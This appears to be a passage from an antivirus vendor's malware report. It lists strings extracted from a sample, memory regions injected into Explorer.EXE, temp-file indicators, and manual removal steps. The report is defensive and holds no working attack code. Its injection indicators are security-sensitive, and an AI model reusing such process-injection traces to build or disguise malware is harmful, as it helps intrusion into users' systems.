Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
INJ2AF6.tmp_3644_rwx_00400000_0011E000:
Explorer.EXE_2024_rwx_01EE0000_00001000:
C:\Windows\TEMP\INJ6F2.tmp
Explorer.EXE_2024_rwx_02D60000_00001000:
C:\Windows\TEMP\INJ2AF6.tmp
Remove it with Ad-Aware
- Click here to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
  %original file name%.exe:1760
  VRT26C2.tmp:1828
  VRT28F.tmp:1856
- Delete the original Virus file.
- Delete or disinfect the following files created/modified by the Virus:
  C:\Windows\Temp\INJ2AF6.tmp (1 bytes)
  C:\Windows\Temp\INJ6F2.tmp (919 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.